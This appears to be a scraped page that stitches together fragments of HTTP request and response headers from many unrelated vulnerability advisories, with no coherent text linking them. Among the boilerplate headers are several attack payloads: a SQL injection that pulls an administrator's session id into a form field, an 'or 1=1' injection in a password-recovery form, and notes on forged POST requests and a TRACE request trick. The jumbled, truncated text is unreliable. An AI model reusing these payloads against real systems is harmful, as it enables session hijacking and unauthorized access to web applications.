| New User, Welcome! Login |
Next Page >>
keep/alive
Date: Mon, 27 Aug 2007 18:58:21 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/xml
21db
Escape character is '^]'
GET /icons/ http/1.1
Host: localhost
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
2. Cross-site Scripting vulnerability in
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
> rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
> Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='
If admin is currently logged in, attacker will see his session id in the email field of 'UserSettings' form.
If admin doesn't explicitly logout (for e.g. close the browser before click on 'Logout' link) his session
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:47:29 GMT
Server: Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch mod_python/3.3.1 Python/2.4.5
Content-Length: 666
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9)
Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
COMPLETE HTTP RESPONSE:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
COMPLETE HTTP RESPONSE:
HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
He would first log in to the appliance using his own credentials in order to get an authenticated session cookie (CGISESSID=xxxxxxxxxxxxxxxxxx)
then he could send a forged POST request similar to the one below:
POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1
User-Agent: xxxxxx
Keep-Alive: 300
Connection: Keep-alive
Cookie: CGISESSID=xxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-length: 56
Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8780/konakartadmin/
Konakart is actually using org.eclipse.birt.core_2.2.1.r22x_v20070924, that is
1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
#Host: [HOST]
#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
#Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
#Keep-Alive: 300
#Proxy-Connection: keep-alive
#Referer: http://[HOST]/[PATH]/html/plugin.php?page=your_account.php&mode=passlost
#
#username=pepe%27+or+1%3D%271&recupera_pass=Recover+password --> OK, sending code
#
This tricks is available on all Apache http servers.
In the Same TCP Session ..
GET / HTTP / 1 . 1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE
GET / HTTP/1.1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE
#Host: www.onlinegrades.org
#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 Paros/3.2.13
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
#Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
#Keep-Alive: 300
#Proxy-Connection: keep-alive
#Referer: http://www.onlinegrades.org/demo/parents/parents.php?func=showreportcard
#Cookie: SESS82c464aff4a6373c38ca1d81df10661e=li1lag4844furho010a5ok8uq7; PHPSESSID=2ofepluotebqj7qu009qskaeg7
#Content-Type: application/x-www-form-urlencoded
#Content-length: 72
User-Agent: FireFox-3-RoXx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://[HOST]/webmediaexpl/htdocs/index.php?action=remember
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on
"Log In":
>> POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1 Host:
>> <server> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
>> 10.6; en-US; rv: 1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
>> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115
>> Connection: keep-alive Content-Type:
>> application/x-www-form-urlencoded; charset=UTF-8 Content-Length:
>> 219 Cookie:
>> wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
>>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.65.78.211:4848/common/security/realms/manageUsers.jsf?name=admin-realm&configName=server-config&bare=true
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
This then gave access to the create user page, however it is important that when the submit button is pressed the resultant POST request be converted to a TRACE request.
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 1430
> 1.9.2.10) Gecko/20100914 Firefox/3.6.10
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 115
> Connection: keep-alive
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
> Content-Length: 219
> Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
> %26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
The attacker have to craft a malicious request.
Example:
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DialogText=&Advanced=1
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on
"Log In":
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on
"Log In":
Next Page>>
|
|
|
